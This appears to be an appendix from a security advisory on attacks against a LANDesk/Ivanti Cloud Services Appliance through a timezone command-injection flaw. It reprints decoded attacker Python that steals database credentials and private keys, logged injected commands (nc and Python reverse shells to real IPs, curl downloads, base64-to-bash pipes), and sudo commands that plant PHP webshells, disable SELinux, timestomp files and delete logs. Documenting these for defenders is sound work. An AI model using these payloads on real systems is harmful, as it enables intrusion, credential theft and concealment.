   os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='service'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
   r = None
with open("/opt/landesk/broker/broker.conf") as f:
   dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
if r:
   p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\'service'\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("n")[-4].strip().split(':')
   os.system("tar zxvf {}".format(r))
   while True:
       for f in os.listdir('.'):
           if re.match("phpw{6}", f):
               os.chmod(f, 0o777)
               m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
               if m:
                   set_msg(dbpwd, "PASSWORD", m)
                   time.sleep(30)
                   set_msg(dbpwd)
                   exit()
else:
   set_msg(dbpwd, 'ERROR', 'NO BACKUP')
}
import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
   if t and m:
       msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ''
   os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
   r = None
with open("/opt/landesk/broker/broker.conf") as f:
   dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
if r:
   p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\'admin\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("n")[-4].strip().split(':')
   os.system("tar zxvf {}".format(r))
   while True:
       for f in os.listdir('.'):
           if re.match("phpw{6}", f):
               os.chmod(f, 0o777)
               m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
               if m:
                   set_msg(dbpwd, "PASSWORD", m)
                   time.sleep(30)
                   set_msg(dbpwd)
                   exit()
else:
   set_msg(dbpwd, 'ERROR', 'NO BACKUP')
import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
   if t and m:
       msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ''
   os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
   r = None
with open("/opt/landesk/broker/broker.conf") as f:
   dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
if r:
   p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\'admin\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("n")[-4].strip().split(':')
   os.system("tar zxvf {}".format(r))
   while True:
       for f in os.listdir('.'):
           if re.match("phpw{6}", f):
               os.chmod(f, 0o777)
               m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
               if m:
                   set_msg(dbpwd, "PASSWORD", m)
                   time.sleep(30)
                   set_msg(dbpwd)
                   exit()
else:
   set_msg(dbpwd, 'ERROR', 'NO BACKUP')

{
import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
   if t and m:
       msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ''
   os.system('''export PGPASSWORD={};echo "update user_info set organization='{}',lockoutalert=0,attempts=0 where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))

with open("/opt/landesk/broker/broker.conf") as f:
   dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]

   p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\'admin\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("n")[-4].strip()
   v = p.split(':')
   k = os.popen('base 64 -w0 root/.certs/{}.key'.format(v[1])).read()
   set_msg(dbpwd, "PASSWORD", p+'||'+k)
   time.sleep(30)
   set_msg(dbpwd)
}

{
import os, re, base64, time

def set_msg(p, t='', m=''):
   if t and m:
       msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ''
   os.system('''export PGPASSWORD={};echo "update user_info set organization='{}',lockoutalert=0 where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))

os.chdir("/tmp")
d = "/backups"
try:
   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
   r = None
with open("/opt/landesk/broker/broker.conf") as f:
   dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
   os.system('''export PGPASSWORD={};echo "delete from user_info where runas='Nobody'"|psql -d brokerdb -U gsbadmin'''.format(dbpwd))
   if r:
       p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\'admin\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("n")[-4].strip().split(':')
       os.system("tar zxvf {}".format(r))
       while True:
           for f in os.listdir('.'):
               if re.match("phpw{6}", f):
                   os.chmod(f, 0o777)
                   m = os.popen("./{} '{}' '{}' '{}' root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
                   if m:
                       set_msg(dbpwd, "PASSWORD", m)
                       time.sleep(30)
                       set_msg(dbpwd)
                       exit()
   else:
       set_msg(dbpwd, 'ERROR', 'NO BACKUP')
}
{
import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
   if t and m:
       msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ''
   os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
   r = None
with open("/opt/landesk/broker/broker.conf") as f:
   dbpwd = re.findall("PGSQL_PW=(.*)", f.read())[0]
   os.system('''export PGPASSWORD={};echo "delete from user_info where runas='Nobody'"|psql -d brokerdb -U gsbadmin'''.format(dbpwd))
if r:
   p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\'admin\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("n")[-4].strip().split(':')
   os.system("tar zxvf {}".format(r))
   while True:
       for f in os.listdir('.'):
           if re.match("phpw{6}", f):
               os.chmod(f, 0o777)
               m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
               if m:
                   set_msg(dbpwd, "PASSWORD", m)
                   time.sleep(30)
                   set_msg(dbpwd)
                   exit()
else:
   set_msg(dbpwd, 'ERROR', 'NO BACKUP')
}

Decoded datetime.php 'timezone' Exploit base64 Scripts

{
Sep  5 01:09:59 REDACTED gsb[996]: /etc/php.ini
rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo 
"update user_info set organization='||/usr/bin/echo import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
  if t and m:
      msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ''
  os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open("/opt/landesk/broker/broker.conf") as f:
  dbpwd = re.findall("PGSQL_PW=(.*)", f.read
())[0]
if r:
  p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\'admin\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("n")[-4].strip().split(':')
  os.system("tar zxvf {}".format(r))
  while True:
      for f in os.listdir('.'):
          if re.match("phpw{6}", f):
              os.chmod(f, 0o777)
              m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, "PASSWORD", m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, 'ERROR', 'NO BACKUP')
| /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb -U gsbadmin;' (1)
}
{
Sep  5 01:47:01 REDACTED gsb[2599]: /etc/php.ini
rewritten with new timezone: ';/usr/bin/echo 
import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
  if t and m:
      msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ''
  os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open("/opt/landesk/broker/broker.conf") as f:
  dbpwd = re.findall("PGSQL_PW=(.*)", f.read
())[0]
if r:
  p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\'admin\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("n")[-4].strip().split(':')
  os.system("tar zxvf {}".format(r))
  while True:
      for f in os.listdir('.'):
          if re.match("phpw{6}", f):
              os.chmod(f, 0o777)
              m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, "PASSWORD", m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, 'ERROR', 'NO BACKUP')  
| /usr/bin/base64 -d | python;' (1)
}
{
Sep  5 02:14:08 REDACTED gsb[1273]: /etc/php.ini
rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo 
"update user_info set organization='||/usr/bin/echo import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
  if t and m:
      msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ''
  os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open("/opt/landesk/broker/broker.conf") as f:
  dbpwd = re.findall("PGSQL_PW=(.*)", f.read
())[0]
if r:
  p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\'admin\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("n")[-4].strip().split(':')
  os.system("tar zxvf {}".format(r))
  while True:
      for f in os.listdir('.'):
          if re.match("phpw{6}", f):
              os.chmod(f, 0o777)
              m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, "PASSWORD", m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, 'ERROR', 'NO BACKUP')
| /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb -U gsbadmin;' (1)
}
{
Sep  5 22:22:06 REDACTED gsb[9367]: /etc/php.ini
rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo 
"update user_info set organization='||/usr/bin/echo import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
  if t and m:
      msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ''
  os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open("/opt/landesk/broker/broker.conf") as f:
  dbpwd = re.findall("PGSQL_PW=(.*)", f.read
())[0]
if r:
  p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\'admin\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("n")[-4].strip().split(':')
  os.system("tar zxvf {}".format(r))
  while True:
      for f in os.listdir('.'):
          if re.match("phpw{6}", f):
              os.chmod(f, 0o777)
              m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, "PASSWORD", m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, 'ERROR', 'NO BACKUP')
| /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb -U gsbadmin;' (1)
}
{
Sep  6 02:39:11 REDACTED gsb[21266]: /etc/php.ini
rewritten with new timezone: ';/usr/bin/echo 
import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
  if t and m:
      msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ''
  os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open("/opt/landesk/broker/broker.conf") as f:
  dbpwd = re.findall("PGSQL_PW=(.*)", f.read
())[0]
if r:
  p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\'admin\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("n")[-4].strip().split(':')
  os.system("tar zxvf {}".format(r))
  while True:
      for f in os.listdir('.'):
          if re.match("phpw{6}", f):
              os.chmod(f, 0o777)
              m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, "PASSWORD", m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, 'ERROR', 'NO BACKUP')  
| /usr/bin/base64 -d | python;' (1)
}
{
Sep  6 03:03:44 REDACTED gsb[11427]: /etc/php.ini
rewritten with new timezone: ';bash /tmp/Xa27efd2.tmp;' (1)
}
{
Sep  8 05:18:35 REDACTED gsb[5132]: /etc/php.ini
rewritten with new timezone: ';/sbin/backuptool --backup;' (1)
}
{
Sep  8 05:19:34 REDACTED gsb[5325]: /etc/php.ini
rewritten with new timezone: ';/usr/bin/echo 
import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
  if t and m:
      msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ''
  os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open("/opt/landesk/broker/broker.conf") as f:
  dbpwd = re.findall("PGSQL_PW=(.*)", f.read
())[0]
if r:
  p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\'admin\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("n")[-4].strip().split(':')
  os.system("tar zxvf {}".format(r))
  while True:
      for f in os.listdir('.'):
          if re.match("phpw{6}", f):
              os.chmod(f, 0o777)
              m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, "PASSWORD", m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, 'ERROR', 'NO BACKUP')   
| /usr/bin/base64 -d | python;' (1)
}
{
Sep  8 10:37:35 REDACTED gsb[6196]: /etc/php.ini
rewritten with new timezone: ';nc REDACTED
80 -ssl -e /bin/bash;' (1)
}
{
Sep  8 10:40:38 REDACTED gsb[8758]: /etc/php.ini
rewritten with new timezone: ';curl https://gggg.oyr2ohrm.eyes.sh
/;' (1)
}
{
Sep  8 10:41:35 REDACTED gsb[7475]: /etc/php.ini
rewritten with new timezone: ';curl 98.98.54.209/a.sh -o /dev/shm/a.sh
;' (1)
}
{
Sep  8 13:10:37 REDACTED gsb[22555]: /etc/php.ini
rewritten with new timezone: ';nc REDACTED
80 --ssl -e /bin/bash;' (1)
}
{
Sep  8 13:21:06 REDACTED gsb[24954]: /etc/php.ini
rewritten with new timezone: ';nc REDACTED
80 --ssl -e /bin/bash;' (1)
}
{
Sep  8 20:23:14 REDACTED gsb[1899]: /etc/php.ini
rewritten with new timezone: ';export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo 
"update user_info set organization='||/usr/bin/echo import os, re, base64, time
os.chdir("/tmp")
d = "/backups"
def set_msg(p, t='', m=''):
  if t and m:
      msg = 'AA{}:{}BB'.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ''
  os.system('''export PGPASSWORD={};echo "update user_info set organization='{}' where username='admin'"|psql -d brokerdb -U gsbadmin'''.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open("/opt/landesk/broker/broker.conf") as f:
  dbpwd = re.findall("PGSQL_PW=(.*)", f.read
())[0]
if r:
  p = os.popen("export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\'admin\' | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().split("n")[-4].strip().split(':')
  os.system("tar zxvf {}".format(r))
  while True:
      for f in os.listdir('.'):
          if re.match("phpw{6}", f):
              os.chmod(f, 0o777)
              m = os.popen("./{} {} {} {} root/.certs/{}.key {}".format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, "PASSWORD", m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, 'ERROR', 'NO BACKUP')   
| /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb -U gsbadmin;' (1)
}
{
Sep 10 04:36:30 REDACTED gsb[16012]: /etc/php.ini
rewritten with new timezone: ';/usr/bin/echo 
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("45.33.101.53
",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'== | /usr/bin/base64 -d | /bin/bash;' (1)
}
{
Sep 10 11:48:32 csa gsb[6829]: /etc/php.ini
rewritten with new timezone: ';/bin/
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("156.234.193.18",44345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);';' (1)
}
{
Sep 10 05:33:42 REDACTED gsb[17292]: /etc/php.ini
rewritten with new timezone: ';/usr/bin/echo 
import os, re, time
os.chdir("/tmp")
d = "/backups/backup-09-01-2024_010101.tar.gz"
with open("/opt/landesk/broker/broker.conf") as f:
  dbpwd = re.findall("PGSQL_PW=(.*)", f.read
())[0]
if os.path.exists(d):
  os.system("tar zxf {}".format(d))
  pwd = os.popen("export PGPASSWORD={};echo SELECT username,passwd FROM user_info | psql -d brokerdb -U gsbadmin -h localhost".format(dbpwd)).read().strip()
  p = pwd.split(':')
  k = os.popen("cat root/.certs/{}.0".format(p[1])).read().strip()
  os.system('''export PGPASSWORD={};echo "INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (1, '{}', '1', '{}', '2024-03-13 05:10:16.926012')"|psql -d brokerdb -U gsbadmin'''.format(dbpwd, k[0:200], k[200:700]))
  os.system('''export PGPASSWORD={};echo "INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (2, '{}', '2', '{}', '2024-03-13 05:10:16.926012')"|psql -d brokerdb -U gsbadmin'''.format(dbpwd, k[700:900], k[900:]))
  os.system('''export PGPASSWORD={};echo "INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (3, '{}', '3', '{}', '2024-03-13 05:10:16.926012')"|psql -d brokerdb -U gsbadmin'''.format(dbpwd, pwd[0:200], pwd[200:700]))
  time.sleep(60)
  os.system('''export PGPASSWORD={};echo "DELETE FROM blockedcerts"|psql -d brokerdb -U gsbadmin'''.format(dbpwd))
  os.system("rm -rdf *;rm -rf *")== | /usr/bin/base64 -d | python;' (1)
}

Appendix B: Sudo Commands

See Table 14 for a list of known sudo commands executed by the threat actors.

Command Use
sudo:  nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/opt/landesk/ldms/LDClient/ldpclient -i ;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d '=' -f2-`;echo "update user_info set organization='||/usr/bin/echo aW1wb3J0IG9zLCByZSwgYmFzZTY0LCB0aW1lCm9zLmNoZGlyKCIvdG1wIikKZCA9ICIvYmFja3VwcyIKZGVmIHNldF9tc2cocCwgdD0nJywgbT0nJyk6CiAgICBpZiB0IGFuZCBtOgogICAgICAgIG1zZyA9ICdBQXt9Ont9QkInLmZvcm1hdCh0LCBiYXNlNjQuYjY0ZW5jb2RlKG0uZW5jb2RlKCkpLmRlY29kZSgpKQogICAgZWxzZToKICAgICAgICBtc2cgPSAnJwogICAgb3Muc3lzdGVtKCcnJ2V4cG9ydCBQR1BBU1NXT1JEPXt9O2VjaG8gInVwZGF0ZSB1c2VyX2luZm8gc2V0IG9yZ2FuaXphdGlvbj0ne30nIHdoZXJlIHVzZXJuYW1lPSdhZG1pbicifHBzcWwgLWQgYnJva2VyZGIgLVUgZ3NiYWRtaW4nJycuZm9ybWF0KHAsIG1zZykpCnRyeToKICAgIHIgPSBtYXgoW29zLnBhdGguam9pbihkLCBmKSBmb3IgZiBpbiBvcy5saXN0ZGlyKGQpIGlmIG9zLnBhdGguaXNmaWxlKG9zLnBhdGguam9pbihkLCBmKSldLCBrZXk9b3MucGF0aC5nZXRtdGltZSkKZXhjZXB0OgogICAgciA9IE5vbmUKd2l0aCBvcGVuKCIvb3B0L2xhbmRlc2svYnJva2VyL2Jyb2tlci5jb25mIikgYXMgZjoKICAgIGRicHdkID0gcmUuZmluZGFsbCgiUEdTUUxfUFc9KC4qKSIsIGYucmVhZCgpKVswXQppZiByOgogICAgcCA9IG9zLnBvcGVuKCJleHBvcnQgUEdQQVNTV09SRD17fTtlY2hvIFNFTEVDVCBwYXNzd2QgRlJPTSB1c2VyX2luZm8gV0hFUkUgdXNlcm5hbWU9XFwnYWRtaW5cXCcgfCBwc3FsIC1kIGJyb2tlcmRiIC1VIGdzYmFkbWluIC1oIGxvY2FsaG9zdCIuZm9ybWF0KGRicHdkKSkucmVhZCgpLnNwbGl0KCJcbiIpWy00XS5zdHJpcCgpLnNwbGl0KCc6JykKICAgIG9zLnN5c3RlbSgidGFyIHp4dmYge30iLmZvcm1hdChyKSkKICAgIHdoaWxlIFRydWU6CiAgICAgICAgZm9yIGYgaW4gb3MubGlzdGRpcignLicpOgogICAgICAgICAgICBpZiByZS5tYXRjaCgicGhwXHd7Nn0iLCBmKToKICAgICAgICAgICAgICAgIG9zLmNobW9kKGYsIDBvNzc3KQogICAgICAgICAgICAgICAgbSA9IG9zLnBvcGVuKCIuL3t9IHt9IHt9IHt9IHJvb3QvLmNlcnRzL3t9LmtleSB7fSIuZm9ybWF0KGYsIHBbNF0sIHBbNV0sIHBbNl0sIHBbMV0sIHBbMV0pKS5yZWFkKCkuc3RyaXAoKQogICAgICAgICAgICAgICAgaWYgbToKICAgICAgICAgICAgICAgICAgICBzZXRfbXNnKGRicHdkLCAiUEFTU1dPUkQiLCBtKQogICAgICAgICAgICAgICAgICAgIHRpbWUuc2xlZXAoMjQwKQogICAgICAgICAgICAgICAgICAgIHNldF9tc2coZGJwd2QpCiAgICAgICAgICAgICAgICAgICAgZXhpdCgpCmVsc2U6CiAgICBzZXRfbXNnKGRicHdkLCAnRVJST1InLCAnTk8gQkFDS1VQJykKICAgIAogICAgCg== | /usr/bin/base64 -d | python||' where username='admin'"|psql -d brokerdb -U gsbadmin;

Updates the “organization” field of the “admin” account in the PGSQL database with python script decoded from base64. 

The python script decompresses the latest backup of the PGSQL database and extracts the password for the gsbadmin account to access the database.
nobody : user NOT in sudoers ; TTY=unknown ; PWD=/usr/bin ; USER=root ; COMMAND=/sbin/setenforce 0 Temporarily disables SELinux.
sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo REDACTED_BASE64_PASSWORD | base64 >/opt/landesk/broker/webroot/gsb/site.cnf Exfiltrates credentials and places them in a site.cnf webfile.
sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo PD9waHAgZXZhbCgkX1BPU1RbImNiNzg2OGM0NjA zNTQ4NTdiNzE5MjA0ZTI3NjZlZGJlIl0pOw== | base64 -d >/opt/landesk/broker/webroot/gsb/view.php Creates a webshell at view.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/tripwire --update ;/usr/bin/echo ZWNobyAiPD9waHAgc3lzdGVtKCcvYmluL3N1ZG8gJy4Gq

FwkX1JFUVVFU1RbJ2EnXSk7IiA+IC9vcHQvbGFuZGVzay9icm

9rZXIvd2Vicm9vdC9nc2IvaGVscC5waHA= | /usr/bin/base64 -d | /bin/bash;

 Creates a webshell at help.php.
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/setPhpTimeZone($TIMEZONE)/// setPhpTimeZone()/g' /opt/landesk/broker/webroot/gsb/DateTimeTab.php Comments out the function setPhpTimeZone in DateTimeTab.php that logs the full exploit command.
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/setSystemTimeZone( $TIMEZONE )/// setSystemTimeZone( $TIMEZONE )/g' /opt/landesk/broker/webroot/gsb/DateTimeTab.php Comments out the vulnerable function setSystemTimeZone in DateTimeTab.php.
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/GSB main page/GSB main pageneval($_POST["in39112cnnpkyc1os01q34gp6r60akgi"]);/g' /opt/landesk/broker/webroot/client/index.php Adds a webshell into index.php.
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i 's/$canvas_height = 600;/$canvas_height = 600;nteval($_POST["in39112cnnpkyc1os01q34gp6r60akgi"]);/' /opt/landesk/broker/webroot/gsb/style.php Adds a webshell into style.php.
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/client/index.php Timestomping attempt to change the access and modification of time of index.php.
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/style.php Timestomping attempt to change the access and modification time of style.php
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/DateTimeTab.php Timestomping attempt to change the access and modification time of DateTimeTab.php.
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/help.php Timestomping attempt to change the access and modification time of help.php
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /var/log/messages Removes evidence.
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/site.cnf Removes site.cnf file (exfiltrated credentials).
sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/client/client.php Removes one of the original webshells.

